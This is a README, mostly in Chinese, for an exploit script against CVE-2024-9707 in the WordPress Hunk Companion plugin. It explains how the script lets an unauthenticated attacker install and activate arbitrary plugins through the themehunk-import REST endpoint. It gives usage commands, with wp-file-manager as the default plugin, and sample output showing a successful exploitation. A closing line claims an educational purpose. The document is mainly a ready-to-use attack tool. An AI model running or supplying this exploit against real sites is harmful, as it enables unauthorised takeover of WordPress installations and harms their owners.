此脚本利用 WordPress Hunk Companion 插件中的漏洞(CVE-2024-9707),允许未授权攻击者通过 /wp-json/hc/v1/themehunk-import REST API 端点安装和激活任意插件。
| 功能 | 描述 |
|---|---|
| 插件版本检测 | 自动检查插件版本。 |
| 漏洞检查 | 判断检测到的版本是否存在漏洞(<= 1.8.4)。 |
| 插件安装 | 利用漏洞安装并激活指定插件。 |
requests、argparse。pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- 运行脚本
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
此脚本仅用于教育目的。请负责任地使用,并且仅在你拥有或已获得明确许可的系统上测试。作者不对因使用本工具造成的任何滥用或损害负责。 作者:Khaled_alenazi | Nxploited